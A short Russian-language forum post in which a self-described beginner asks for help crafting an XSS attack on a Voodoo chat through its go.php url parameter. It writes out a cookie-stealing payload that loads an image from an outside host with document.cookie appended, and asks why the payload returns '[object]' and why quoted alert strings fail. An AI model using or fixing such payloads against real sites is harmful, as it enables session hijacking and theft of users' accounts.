Здраствуйте. Помогите новичку с составлением запроса для XSS. Нашел стандартную уязвимость в одном Voodoo-чате :
http://xxx.xxx/go.php?url=javascript:alert(/test/);
Составил следущий код:
http://ххх.ххх/go.php?url=javascript:img=new%20Image();img.src="h ttp://s.netsec.ru/cyber_rat.gif?"+document.cookie;

Но вместо рисунка появляется "[object]"

И еще :
alert(/test/); - выводит окошко с надписью /test/
но ни alert(test);, ни alert("test");, ни alert('test'); не выводят ничего.